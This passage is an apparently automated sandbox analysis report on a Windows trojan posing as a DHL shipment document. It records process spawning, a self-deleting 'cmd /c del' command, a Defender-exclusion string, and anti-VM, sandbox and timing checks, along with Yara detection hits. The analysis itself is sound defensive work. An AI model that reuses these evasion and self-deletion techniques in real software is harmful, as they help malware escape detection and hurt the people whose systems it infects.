          Source: DHL Shipment doc.exe, 00000000.00000002.692381067.0000000000F68000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize40.exe6 vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.692850983.0000000003442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.695973964.0000000006520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.692578717.0000000001570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.694907336.0000000005890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000001.00000002.685838635.0000000000478000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize40.exe6 vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000003.00000002.804951259.00000000033BF000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000003.00000000.687871473.00000000009B8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize40.exe6 vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000003.00000002.804229459.000000000164F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000003.00000002.801396989.00000000014BF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000003.00000003.788765239.00000000033B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAUTOCONV.EXEj% vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exeBinary or memory string: OriginalFilenameStaticArrayInitTypeSize40.exe6 vs DHL Shipment doc.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: DHL Shipment doc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: DHL Shipment doc.exeReversingLabs: Detection: 34%
          Source: DHL Shipment doc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL Shipment doc.exe "C:\Users\user\Desktop\DHL Shipment doc.exe"
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Users\user\Desktop\DHL Shipment doc.exe C:\Users\user\Desktop\DHL Shipment doc.exe
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Users\user\Desktop\DHL Shipment doc.exe C:\Users\user\Desktop\DHL Shipment doc.exe
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL Shipment doc.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Users\user\Desktop\DHL Shipment doc.exe C:\Users\user\Desktop\DHL Shipment doc.exeJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Users\user\Desktop\DHL Shipment doc.exe C:\Users\user\Desktop\DHL Shipment doc.exeJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exeJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL Shipment doc.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Shipment doc.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/1@7/4
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2340:120:WilError_01
          Source: DHL Shipment doc.exe, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: DHL Shipment doc.exe, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.DHL Shipment doc.exe.ee0000.0.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.DHL Shipment doc.exe.ee0000.0.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.DHL Shipment doc.exe.ee0000.0.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.DHL Shipment doc.exe.ee0000.0.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.DHL Shipment doc.exe.3f0000.1.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.DHL Shipment doc.exe.3f0000.1.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.DHL Shipment doc.exe.3f0000.0.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.DHL Shipment doc.exe.3f0000.0.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.DHL Shipment doc.exe.3f0000.3.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.DHL Shipment doc.exe.3f0000.3.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: DHL Shipment doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DHL Shipment doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: DHL Shipment doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: StaticArrayInitTypeSize40.pdbxD source: DHL Shipment doc.exe
          Source: Binary string: msiexec.pdb source: DHL Shipment doc.exe, 00000003.00000002.804927293.00000000033B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: StaticArrayInitTypeSize40.pdb source: DHL Shipment doc.exe
          Source: Binary string: msiexec.pdbGCTL source: DHL Shipment doc.exe, 00000003.00000002.804927293.00000000033B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DHL Shipment doc.exe, 00000003.00000002.801396989.00000000014BF000.00000040.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000003.00000002.799983136.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DHL Shipment doc.exe, 00000003.00000002.801396989.00000000014BF000.00000040.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000003.00000002.799983136.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: autoconv.pdb source: DHL Shipment doc.exe, 00000003.00000003.788765239.00000000033B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: autoconv.pdbGCTL source: DHL Shipment doc.exe, 00000003.00000003.788765239.00000000033B0000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: DHL Shipment doc.exe, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.0.DHL Shipment doc.exe.ee0000.0.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.2.DHL Shipment doc.exe.ee0000.0.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.0.DHL Shipment doc.exe.3f0000.1.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.0.DHL Shipment doc.exe.3f0000.0.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.0.DHL Shipment doc.exe.3f0000.3.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.0.DHL Shipment doc.exe.3f0000.2.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.2.DHL Shipment doc.exe.3f0000.0.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.0.DHL Shipment doc.exe.930000.3.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.0.DHL Shipment doc.exe.930000.5.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.0.DHL Shipment doc.exe.930000.9.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.2.DHL Shipment doc.exe.930000.1.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.0.DHL Shipment doc.exe.930000.0.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.0.DHL Shipment doc.exe.930000.1.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 0_2_0190F448 push esp; retf 0_2_0190F455
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 0_2_01901C58 push ebx; iretd 0_2_01901C7A
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0041B832 push eax; ret 3_2_0041B838
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0041B83B push eax; ret 3_2_0041B8A2
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0041B89C push eax; ret 3_2_0041B8A2
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0040825A push ecx; retf 3_2_0040825B
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0040C38A pushfd ; ret 3_2_0040C3A0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00415CC4 push FFFFFFDFh; iretd 3_2_00415CDA
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0041B7E5 push eax; ret 3_2_0041B838
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D5D0D1 push ecx; ret 11_2_04D5D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EAB89C push eax; ret 11_2_00EAB8A2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EAB83B push eax; ret 11_2_00EAB8A2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EAB832 push eax; ret 11_2_00EAB838
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00E9825A push ecx; retf 11_2_00E9825B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00E9C38A pushfd ; ret 11_2_00E9C3A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA5CC4 push FFFFFFDFh; iretd 11_2_00EA5CDA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EAB7E5 push eax; ret 11_2_00EAB838
          Source: DHL Shipment doc.exeStatic PE information: 0x9CDF513F [Mon May 26 14:03:43 2053 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.71171540744

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del "C:\Users\user\Desktop\DHL Shipment doc.exe"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del "C:\Users\user\Desktop\DHL Shipment doc.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 0.2.DHL Shipment doc.exe.34817e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL Shipment doc.exe.3431884.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.692850983.0000000003442000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: DHL Shipment doc.exe PID: 5032, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: DHL Shipment doc.exe, 00000000.00000002.692850983.0000000003442000.00000004.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: DHL Shipment doc.exe, 00000000.00000002.692850983.0000000003442000.00000004.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe TID: 6516Thread sleep time: -33638s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe TID: 2124Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3220Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004088E0 rdtsc 3_2_004088E0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.4 %
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeThread delayed: delay time: 33638Jump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.711726949.000000000FD29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
          Source: explorer.exe, 00000006.00000000.709401670.000000000A897000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.717648166.0000000004791000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.745779172.000000000A60E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.702067652.0000000006650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.745779172.000000000A60E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.708216741.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000006.00000000.746609215.000000000A897000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA`
          Source: explorer.exe, 00000006.00000000.734788131.0000000004710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000006.00000000.708216741.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000006.00000000.708216741.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004088E0 rdtsc 3_2_004088E0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD8CD6 mov eax, dword ptr fs:[00000030h]11_2_04DD8CD6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DC14FB mov eax, dword ptr fs:[00000030h]11_2_04DC14FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D86CF0 mov eax, dword ptr fs:[00000030h]11_2_04D86CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D86CF0 mov eax, dword ptr fs:[00000030h]11_2_04D86CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D86CF0 mov eax, dword ptr fs:[00000030h]11_2_04D86CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1849B mov eax, dword ptr fs:[00000030h]11_2_04D1849B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D9C450 mov eax, dword ptr fs:[00000030h]11_2_04D9C450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D9C450 mov eax, dword ptr fs:[00000030h]11_2_04D9C450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3A44B mov eax, dword ptr fs:[00000030h]11_2_04D3A44B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2746D mov eax, dword ptr fs:[00000030h]11_2_04D2746D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD740D mov eax, dword ptr fs:[00000030h]11_2_04DD740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD740D mov eax, dword ptr fs:[00000030h]11_2_04DD740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD740D mov eax, dword ptr fs:[00000030h]11_2_04DD740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D86C0A mov eax, dword ptr fs:[00000030h]11_2_04D86C0A
